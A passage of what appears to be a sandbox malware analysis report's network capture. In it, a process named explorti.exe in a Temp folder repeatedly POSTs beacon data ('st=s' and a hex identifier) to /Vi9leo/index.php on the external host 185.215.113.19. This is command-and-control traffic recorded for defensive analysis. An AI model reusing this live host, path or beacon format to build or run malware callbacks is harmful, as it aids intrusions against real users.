                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:46.721968889 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:46.982356071 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.656758185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:47.098397970 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:47.906388044 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:47.918606043 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:48.173125982 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.656760185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:48.294779062 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:49.061882973 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:49.062551975 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:49.316051960 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.656761185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:49.436431885 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:50.206028938 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:50.207025051 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:50.512990952 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.656762185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:50.623004913 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:51.381611109 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:51.382411003 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:51.634221077 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.656763185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:51.748092890 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:52.578602076 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:52.579920053 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:52.829962969 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.656764185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:52.951522112 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:53.721858978 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:53.724915981 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:53.977696896 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.656765185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:54.093653917 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:54.866554022 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:54.868592024 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:55.118202925 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.656766185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:55.232702017 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:56.008327961 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:56.009145975 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:56.541368961 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:04:56.543277025 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.656767185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:56.655301094 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:57.412147999 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:57.413019896 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:57.705214024 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.656768185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:57.826909065 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:58.596900940 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:58.600279093 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:58.851795912 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.656769185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:58.967022896 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:59.743467093 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:59.744066954 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:59.990195036 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.656770185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:05:00.356144905 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
